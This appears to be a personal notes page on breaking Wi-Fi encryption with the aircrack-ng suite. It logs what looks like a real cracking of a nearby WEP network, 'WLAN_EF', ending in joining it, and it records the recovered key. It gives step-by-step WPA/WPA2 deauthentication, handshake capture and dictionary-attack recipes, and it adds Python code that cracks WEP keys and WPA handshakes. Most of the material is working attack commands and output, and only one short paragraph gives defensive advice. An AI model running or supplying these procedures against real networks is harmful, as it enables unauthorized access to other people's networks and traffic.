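What the recipe actually recovers and how the key is then used, as an added example that is not part of the original page or of aircrack-ng (plain Python, standard library only). It shows the 5- or 13-byte key in the hex, ASCII and iwconfig forms the tools print, WEP's per-frame RC4(IV || key) encryption with its CRC-32 ICV, the ICV check that tells a cracker whether a candidate key is right, and the keystream reuse that follows from the 24-bit IV. The key "Ex4mpl3Key123", the IVs and the frame payloads below are constructed for the demonstration; the only real data is the RC4 test vector used in the self-check.

```python
"""Added example, not code from the page or from aircrack-ng.
WEP encrypts each frame body with RC4 keyed by IV || key (24-bit IV,
40- or 104-bit key) and appends a CRC-32 integrity check value (ICV).
All keys, IVs and plaintexts here are constructed for the demonstration."""
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling algorithm followed by the PRGA."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_key_formats(printed: str) -> dict:
    """Take the key as aircrack prints it ('5A 30 30 ...' or '5A:30:30:...')
    and return the forms needed next: hex, ASCII (only if every byte is
    printable) and the colon form accepted by `iwconfig ... key`."""
    key = bytes.fromhex(printed.replace(":", " ").replace(" ", ""))
    if len(key) not in (5, 13):
        raise ValueError("WEP keys are 5 bytes (WEP-64) or 13 bytes (WEP-128)")
    printable = all(0x20 <= b < 0x7F for b in key)
    return {
        "bytes": key,
        "hex": key.hex().upper(),
        "ascii": key.decode("ascii") if printable else None,
        "iwconfig": ":".join("%02X" % b for b in key),
        "type": "WEP-64 (40-bit key)" if len(key) == 5 else "WEP-128 (104-bit key)",
    }


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Frame body as sent on the air: IV (3) | key-id byte | RC4(IV||key, data || ICV).
    The key-id byte carries the key index (0-3) in its top two bits; aircrack-ng's
    -i option numbers the same slots 1-4."""
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    keystream = rc4_keystream(iv + key, len(plaintext) + 4)
    return iv + bytes([key_id << 6]) + xor(plaintext + icv, keystream)


def wep_decrypt(key: bytes, body: bytes):
    """Decrypt with a candidate key; return the data if the ICV verifies, else None.
    This ICV check is how a cracker confirms that a candidate key is the right one."""
    iv, ciphertext = body[:3], body[4:]
    plain = xor(ciphertext, rc4_keystream(iv + key, len(ciphertext)))
    data, icv = plain[:-4], plain[-4:]
    if struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF) != icv:
        return None
    return data


def iv_reuse_leak(body1: bytes, body2: bytes) -> bytes:
    """Two frames under the same IV use the same RC4 keystream, so XORing the
    ciphertexts cancels it and yields plaintext1 XOR plaintext2 without any key.
    With only 2^24 IVs a busy network repeats them within hours."""
    assert body1[:3] == body2[:3], "only meaningful for frames that share an IV"
    return xor(body1[4:], body2[4:])


if __name__ == "__main__":
    formats = wep_key_formats("45 78 34 6D 70 6C 33 4B 65 79 31 32 33")  # constructed key
    print(formats["type"], formats["ascii"], formats["iwconfig"])
    key = formats["bytes"]
    frame = wep_encrypt(key, b"\x01\x02\x03", b"GET / HTTP/1.0\r\n")  # constructed IV and payload
    print(wep_decrypt(key, frame))                # the data: ICV verifies under the right key
    print(wep_decrypt(b"wrongkey12345", frame))   # None: ICV fails under a wrong key
```

The `wep_decrypt` ICV check is the reason a cracker never needs the plaintext: any candidate key that makes the CRC-32 come out right is accepted, and a wrong key fails on the first frame tried. The iwconfig form is what the `key XX:XX:...` argument in the session further down expects; a key such as 21:53:10:19:49 has no ASCII form because 0x10 is not printable.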


Commands and flags
iwlist
wifislax ~ # iwlist
Usage: iwlist [interface] scanning [essid NNN] [last]
              [interface] frequency
              [interface] channel
              [interface] bitrate
              [interface] rate
              [interface] encryption
              [interface] keys
              [interface] power
              [interface] txpower
              [interface] retry
              [interface] ap
              [interface] accesspoints
              [interface] peers
              [interface] event
              [interface] auth
              [interface] wpakeys
              [interface] genie
              [interface] modulation

To display the AP's visible around you, use the command :

iwlist eth1 scan
iwconfig
iwconfig - configure a wireless network interface

Synopsis
iwconfig [interface]
iwconfig interface [essid X] [nwid N] [mode M] [freq F] [channel C] [sens S] [ap A] [nick NN] [rate R] [rts RT] [frag FT] [txpower T] [enc E] [key K] [power P] [retry R] [commit]
iwconfig --help
iwconfig --version

To supply a WPA key, run wpa_supplicant with the interface and a configuration file:

root@om-gta02:~# wpa_supplicant -i eth1 -c /etc/wpa_supplicant/wpa_supplicant.conf -B

and the contents of wpa_supplicant.conf are:

ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=0
eapol_version=1
ap_scan=1
fast_reauth=1
# WPA:
network={
    ssid="your_ssid"
    proto=WPA
    key_mgmt=WPA-PSK
    pairwise=TKIP
    group=TKIP
    scan_ssid=1
    # psk="secret key"
    psk=0hexbmorehex6d1andmorehex1etcetcetc
    priority=10
}

The value of psk must be replaced with the output of:

wpa_passphrase <ssidName> <whateverYourPassphraseis>

which prints the 64-hex-digit PSK derived from the passphrase and the SSID. Using the hex psk rather than the quoted passphrase speeds up association on slow hardware, because wpa_supplicant is spared the PBKDF2 derivation (4096 HMAC-SHA1 iterations over passphrase and SSID) that wpa_passphrase has already done.

airodump-ng
airodump-ng - a packet capture tool for aircrack-ng

Synopsis
airodump-ng [options] <interface name>

-w <prefix>, --write <prefix>   Dump file prefix to use. If this option is not given, it only shows data on the screen.
-d <bssid>, --bssid <bssid>     Only show networks matching the given BSSID.
-a                              Only show associated clients.
aireplay-ng

aireplay-ng injects specially generated ARP-request packets into an existing wireless network in order to generate traffic. By sending these ARP-request packets again and again, the target host will respond with encrypted replies, thus providing new and possibly weak IVs.

Synopsis
aireplay-ng [options] <replay interface>

-a <bssid>   Set Access Point MAC address.
-b <bssid>   MAC address of access point.
-h <smac>    Set source MAC address.
-e <essid>   Set target SSID for Fake Authentication attack (see below).

Attack modes:
-0 <count>, --deauth=<count>     Deauthenticate stations.
-1 <delay>, --fakeauth=<delay>   Fake authentication with AP.
-2, --interactive                Interactive frame selection.
-3, --arpreplay                  Standard ARP-request replay.
-4, --chopchop                   Decrypt/chopchop WEP packet.
-5, --fragment                   Generates a valid keystream.
-9, --test                       Tests injection and quality.
aircrack-ng

aircrack-ng - an 802.11 WEP / WPA-PSK key cracker

Synopsis
aircrack-ng [options] <.cap/.ivs file(s)>

It is better to use aircrack-ptw. (Note: aircrack-ng has shipped the PTW attack itself since version 0.9, where it was selected with -z, and uses it by default for WEP since 1.0, so the separate tool is only needed with older builds.)

Welcome to Aircrack PTW v 1.0.0 (Spanish Build 2)
Official page: http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
Translation and improvements by: Stilo16v (http://www.seguridadwireless.net)
Usage: aircrack-ptw
Example: aircrack-ptw 00-01-02-03-04-05.cap
dhcpcd
Synopsis dhcpcd

wifislax ~ # airodump-ng eth1 -w file1

 CH  1 ][ Elapsed: 1 min ][ 2009-04-11 12:26

 BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:02:CF:75:FE:28    0       24      0    0  10  54.  WEP  WEP         WLAN_EF
 00:02:CF:C0:46:38    0       10      0    0   9  54.  WEP  WEP         WLAN_E0
 00:19:15:4F:92:AA    0      121      0    0   3  54   WEP  WEP         WLAN_C5
 00:16:38:EA:A3:31    0       38      0    0   3  54   WEP  WEP         WLAN_1C
 00:1A:2B:68:9A:0D    0      266      0    0   3  54   WEP  WEP         WLAN_83
 00:1A:2B:0D:1B:CD    0      762      0    0   3  54   WPA  TKIP   PSK  korneret

 BSSID              STATION            PWR  Lost  Packets  Probes
 00:1A:2B:68:9A:0D  00:1D:E0:5A:3F:B3    0     0      801  WLAN_83
 00:1A:2B:68:9A:0D  00:1E:0B:54:9C:28    0     0      681
 00:60:B3:50:E3:E6  00:10:A7:2C:42:1A    0     0     8218
 00:02:CF:DD:5C:AB  00:23:4D:A4:65:B6    0     0       10  WLAN_D0
 (not associated)   00:13:CE:A8:EE:E4    0     0       10  calacinta

wifislax ~ # airodump-ng eth1 -w file1 -d 00:1A:2B:68:9A:0D

 CH  3 ][ Elapsed: 12 s ][ 2009-04-11 12:28

 BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:1A:2B:68:9A:0D    0       43      0    0   3  54   WEP  WEP         WLAN_83

 BSSID              STATION            PWR  Lost  Packets  Probes
 00:1A:2B:68:9A:0D  00:1E:0B:54:9C:28   -1     0        1

wifislax ~ # aireplay-ng -1 0 -e WLAN_EF -a 00:02:CF:75:FE:28 -h 00:11:22:33:44:55 ra0
17:05:22  Waiting for beacon frame (BSSID: 00:02:CF:75:FE:28)
17:05:24  Sending Authentication Request
17:05:24  Authentication successful
17:05:24  Sending Association Request
17:05:24  Association successful :-)

wifislax ~ # aireplay-ng -3 -b 00:02:CF:75:FE:28 -h 00:11:22:33:44:55 ra0
Saving ARP requests in replay_arp-0411-170554.cap
You should also start airodump-ng to capture replies.
Read 67111 packets (got 26432 ARP requests), sent 340904 packets...(335 pps)

wifislax ~ # aircrack-ptw file1-01.cap
Welcome to Aircrack PTW v 1.0.0 (Spanish Build 2)
Official page: http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
Translation and improvements by: Stilo16v (http://www.seguridadwireless.net)
Looking for a new table: BSSID = 00:02:CF:75:FE:28 Keyindex=0
Statistics for BSSID 00:02:CF:75:FE:28 Keyindex=0 Packets=97154
Key found with length 13: 5A 30 30 30 32 43 46 37 37 35 32 45 46
ASCII equivalent: Z0002CF7752EF

wifislax ~ # iwconfig ra0 mode managed key 5A:30:30:30:32:43:46:37:37:35:32:45:46
wifislax ~ # dhcpcd ra0
wifislax ~ # iwconfig
lo        no wireless extensions.

ra0       RT2500 Wireless  ESSID:"WLAN_EF"
          Mode:Managed  Frequency=2.457 GHz  Access Point: 00:02:CF:75:FE:28
          Bit Rate=1 Mb/s   Tx-Power:2 dBm
          RTS thr:off   Fragment thr:off
          Encryption key:5A30-3030-3243-4637-3735-3245-46   Security mode:open
          Link Quality=28/100  Signal level:-82 dBm  Noise level:-97 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

eth0      no wireless extensions.

wifislax ~ # ifconfig ra0
ra0       Link encap:Ethernet  HWaddr 00:11:22:33:44:55
          inet addr:192.168.1.33  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST NOTRAILERS RUNNING  MTU:1500  Metric:1
          RX packets:2179 errors:283030 dropped:0 overruns:0 frame:0
          TX packets:2080731 errors:41 dropped:41 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:1492165 (1.4 MiB)  TX bytes:140732707 (134.2 MiB)
          Interrupt:11 Base address:0x4000

wifislax ~ # ping www.google.es
PING www.l.google.com (209.85.229.99) 56(84) bytes of data.
64 bytes from ww-in-f99.google.com (209.85.229.99): icmp_seq=1 ttl=241 time=643 ms
64 bytes from ww-in-f99.google.com (209.85.229.99): icmp_seq=2 ttl=241 time=645 ms
64 bytes from ww-in-f99.google.com (209.85.229.99): icmp_seq=3 ttl=241 time=669 ms

Practice notes

Auxiliary commands: lspci, startx, dmesg, iwlist, yast

Drivers: T42/Intel BG = ipw2200 (device eth1); RAP/Canyon = rt2400 (device ra0); T400 = Intel 5100 AGN

802.11a/n "ipw5100": PCI vendor 8086, device 4237, mini-PCIe, Intel iwlagn driver

Networks I can see:

WLAN_GAS   00.23.F8.CD.9C.60  [ch 9, sag]
WLAN_F31A  64.68.0C.B8.F3.1D  [ch 3]
WLAN_EF    00.02.CF.75.FE.28  [ch 10]  {5A303030324346373735324546}
xrist      00.21.E9.B7.4E.75  [ch 6, 802.11n]
WLAN_C5    00.19.15.4F.92.AA  [ch 3]  {formerly at X's place}
estudi_AP  00.15.AF.64.54.BF  [ch 1]

WEP key sizes: WEP-64 is a 40-bit key plus the 24-bit IV, entered as 5 ASCII characters or 10 hex digits; WEP-128 is a 104-bit key plus the 24-bit IV, entered as 13 ASCII characters or 26 hex digits. The IV travels in clear with every frame, so the secret part is only 40 or 104 bits.

WifiSlax boot:

iwconfig                                                check that the wireless card is seen
rmmod ipw2200                                           unload the Intel 2200BG driver
modprobe ipw2200 rtap_iface=1                           load the driver (with the radiotap interface)
modinfo ipw2200                                         show driver details
ifconfig ra0 down                                       bring the wifi card down
macchanger -m 00:11:22:33:44:55 ra0                     set a new MAC ("MAC_me")
ifconfig ra0 up                                         bring the wifi card up
iwconfig ra0 mode monitor                               put it into monitor (sniffing) mode
iwconfig wlan0 rate 1M                                  decrease the bit rate
airodump-ng ra0                                         see which networks there are
airodump-ng -w filename --channel 13 ra0                capture one network - see terminal (00:14:95:B8:9E:29="MAC_TA")
aireplay-ng -1 0 -e 2WIRE067 -a MAC_AP_TA -h MAC_me ath0     fake-authenticate so that injected traffic is accepted
aireplay-ng -3 -b MAC_AP_TA -h MAC_me ath0                   inject traffic (ARP replay)
aireplay-ng -1 0 -e weiio -a MAC -h MAC_me ra0
aircrack-ng kyokorn-02.cap                              obtain the key
iwconfig ath0 mode Managed key 21:53:10:19:49           use the "WEP" key ? use the "WPA" key ? (iwconfig key only sets a WEP key; a WPA key goes through wpa_supplicant, see above)
dhcpcd ath0                                             obtain an IP address from the AP

*) airodump-ng -c 11 --bssid AP-MAC_HERE -w output ath0
*) aireplay-ng -1 0 -e SSID-NAME-HERE -a AP-MAC_HERE -h ADAPTER-MAC-HERE ath0
*) aireplay-ng -3 -b AP-MAC_HERE -h ADAPTER-MAC-HERE ath0
*) aircrack-ng -b AP-MAC_HERE output*.ivs
*) or aircrack-ptw output-01.cap

Sometimes it refuses to go into monitor mode:

root@bt:~# iwconfig wlan0 mode monitor
Error for wireless request "Set Mode" (8B06) :
    SET failed on device wlan0 ; Device or resource busy.

Solution: do it with the adapter down (ifconfig wlan0 down, set the mode, then bring it up again).

My environment (since 2010)

airodump-ng wlan0

 CH 13 ][ Elapsed: 12 s ][ 2010-12-04 20:15

 BSSID              PWR  Beacons  #Data, #/s  CH  MB    ENC   CIPHER AUTH ESSID
 00:23:F8:CD:9C:60  -28       23      0    0   9  54 .  WPA   TKIP   PSK  WLAN_GAS
 64:68:0C:B8:F3:1D  -46       24      0    0   3  54    WPA   TKIP   PSK  WLAN_F31A
 00:21:E9:B7:4E:74  -48       27      0    0   6  54e.  WPA2  CCMP   PSK  Xrist

T400 & F31A
iwconfig
rmmod iwlagn
modprobe iwlagn
modinfo iwlagn
ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig
airodump-ng wlan0                                                    see available APs and clients
airodump-ng wlan0 -c 9 -w filename                                   listen on one channel only and save the capture
aireplay-ng -1 0 -a 64:68:0C:B8:F3:1D -h 00:11:22:33:44:55 wlan0    fake authentication (association)
aireplay-ng -3 -b 64:68:0C:B8:F3:1D -h 00:11:22:33:44:55 wlan0      inject traffic (ARP replay)
aircrack-ng -b (bssid) filename.cap                                  find the key

Note that in the scan above WLAN_F31A advertises WPA TKIP PSK on channel 3, while the ARP-replay plus plain aircrack-ng sequence is a WEP attack listening on channel 9; against the network as scanned it would not yield a key.

T400 & Xrist (WPA2)
iwconfig
rmmod iwlagn
modprobe iwlagn
modinfo iwlagn
ifconfig wlan0 down
macchanger -m 00:11:22:33:44:55 wlan0
iwconfig wlan0 mode monitor
ifconfig wlan0 up
iwconfig
airodump-ng wlan0                                                see available APs and clients
airodump-ng wlan0 -c 9                                           listen on one channel only
airodump-ng -c 9 --bssid 00:21:E9:B7:4E:74 -w psk wlan0          capture the 4-way authentication handshake and save it to a file
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:DB:C2 wlan0    deauthenticate the client from the AP so that it reconnects and the handshake is captured
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap        find the key (dictionary attack on the handshake)

(The AP MAC 00:14:6C:7E:40:80 and the client MAC in the last two commands are the example values from the aircrack-ng wiki tutorial, not the Xrist AP captured above; Xrist is on channel 6 in the scan, while the capture command listens on channel 9.)

When we capture it, we shall see:

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80

crack WPA
  1. Wireless card that supports monitor mode (and packet injection, for the deauthentication step)
    Check compatibility here
  2. dictionary file (backtrack comes with a couple)
  3. download the BackTrack 4 flavor of your choice.
  4. boot up backtrack - username: root password: toor
  5. Now type startx and press enter. This logs you into backtrack and you should now see the desktop.
  6. Open a command terminal and type: airmon-ng. Look for the name of your wireless card; it differs between computers, mine is wlan0.
  7. type: airmon-ng stop wlan0
  8. type: macchanger --mac 00:11:22:33:44:55 wlan0
  9. type: airmon-ng start wlan0
    On mac80211 drivers this creates a separate monitor interface (usually mon0) and leaves wlan0 in managed mode; if airmon-ng reports one, use that name instead of wlan0 in the following steps.
  10. type: airodump-ng wlan0
    You will now see all of the wifi networks in range. Once you have found the one you want to hack, press Ctrl + C to stop scanning. Take note of the bssid and channel of the network you want to hack.
  11. type: airodump-ng -c (put the channel # here) -w wpahack --bssid (enter bssid here) wlan0
    Keep that window open; the handshake is only captured while this is running, and a client has to (re)connect during that time.
  12. now open another command terminal and enter the following in the newly opened terminal: type: aireplay-ng -0 5 -a (enter bssid here) wlan0
    Without -c this sends five broadcast deauthentication frames, so the connected clients reconnect and perform the 4-way handshake in front of the capture.
  13. type: aircrack-ng -w (path to a dictionary file) wpahack-01.cap (airodump-ng appends -01 to the prefix given with -w). You should now see it attempting to crack the WPA key; it only succeeds if the passphrase is in the dictionary.
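The wpa_passphrase derivation given earlier and the dictionary step of the WPA procedure (both this list and the T400 & Xrist sequence), as an added example in plain Python, standard library only, that is not part of the page or of aircrack-ng or wpa_supplicant. It derives the PSK the way wpa_passphrase does (checked against the 802.11i test vector for SSID "IEEE" / passphrase "password"), expands it into the PTK with the two MACs and two nonces of the handshake, computes the MIC of EAPOL message 2 and tries a wordlist until one candidate reproduces the captured MIC. The SSID "homenet", the MACs, the nonces, the EAPOL frame, the wordlist and the passphrase "correct horse" are constructed here; a real run would take them from the psk-01.cap or wpahack-01.cap capture.

```python
"""Added example, not code from the page or from aircrack-ng / wpa_supplicant.
What wpa_passphrase computes and what `aircrack-ng -w wordlist` does with a
captured WPA/WPA2 4-way handshake. All handshake values below are constructed."""
import hashlib
import hmac

MIC_OFFSET = 81  # EAPOL header (4) + descriptor type (1) + key info (2) + key length (2)
                 # + replay counter (8) + nonce (32) + key IV (16) + RSC (8) + key ID (8)


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """PSK (= PMK for WPA-PSK): PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 rounds, 32 bytes).
    This is the 64-hex-digit psk= line wpa_passphrase prints; the SSID is the salt,
    which is why precomputed tables are only valid for one SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512 from 802.11i: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    The first 16 bytes are the KCK that authenticates the EAPOL-Key frames."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes, wpa2: bool) -> bytes:
    """MIC over the whole EAPOL-Key frame with its MIC field zeroed:
    HMAC-MD5 for WPA/TKIP, HMAC-SHA1 truncated to 16 bytes for WPA2/CCMP."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    if wpa2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    return hmac.new(kck, zeroed, hashlib.md5).digest()


def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Constructed EAPOL-Key frame shaped like message 2 of the handshake (RSN descriptor,
    key info 0x010a = MIC set, pairwise, HMAC-SHA1 key descriptor version 2, no key data)."""
    body = (b"\x02" + b"\x01\x0a" + b"\x00\x10" + (1).to_bytes(8, "big")
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8 + mic + b"\x00\x00")
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def crack_handshake(ssid, ap_mac, sta_mac, anonce, eapol_msg2, wordlist, wpa2=True):
    """Dictionary attack: derive PSK -> PTK -> KCK for each candidate and compare the
    MIC it produces with the MIC captured in message 2. Returns the passphrase or None."""
    snonce = eapol_msg2[17:49]
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = wpa_ptk(wpa_psk(candidate, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2, wpa2), captured_mic):
            return candidate
    return None


# Constructed handshake for a hypothetical AP "homenet" whose passphrase is "correct horse".
SSID = "homenet"
AP_MAC = bytes.fromhex("020000000001")
STA_MAC = bytes.fromhex("020000000002")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "12345678", "letmein!", "correct horse", "hunter22"]


def make_captured_msg2(passphrase: str) -> bytes:
    """Play the station's side once so that we hold a 'captured' message 2 with a valid MIC."""
    kck = wpa_ptk(wpa_psk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    unsigned = build_eapol_msg2(SNONCE)
    return build_eapol_msg2(SNONCE, eapol_mic(kck, unsigned, wpa2=True))


if __name__ == "__main__":
    print(wpa_psk("password", "IEEE").hex())   # 802.11i test vector: f42c6fc5...9710a12e
    msg2 = make_captured_msg2("correct horse")
    print(crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, msg2, WORDLIST))
```

Two things the procedure does not spell out follow from the code: the attacker needs ANonce (message 1), SNonce and the MIC (message 2) and both MACs, which is why airodump-ng must see the handshake itself rather than just encrypted traffic; and every candidate costs 4096 HMAC-SHA1 rounds salted with the SSID, which is what makes a random 63-character passphrase safe and precomputed tables useful only for the SSIDs they were built for.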


crack WPA2

Tutorial: How to Crack WPA/WPA2

If you want a home wireless network that the dictionary attack above cannot break, use WPA2 with a random passphrase of up to 63 characters (the 802.11i maximum) drawn from letters, digits and special symbols: the handshake can still be captured, but no wordlist will contain such a passphrase, and PBKDF2 at 4096 iterations makes a brute-force search of the full space infeasible.

crack WPA2 revisited 20180521


Pending items

Crack WPA2 AP.


Nets I know

Links

Tutorial: Simple WEP Crack

Tutorial: How to crack WEP with no wireless clients + "Alternate Solution".

Intel 2200 "injection".

Chipset & drivers.

Seguridad Wi-Fi – WEP, WPA y WPA2 : PDF, url.

Cracking WPA, (es).

Dictionaries: Rainbow Tables for WPA-PSK Cracking (33.54 GB). Because the SSID salts the PSK derivation, such tables are precomputed per SSID and only help against the SSIDs they were built for.


Updated 20141229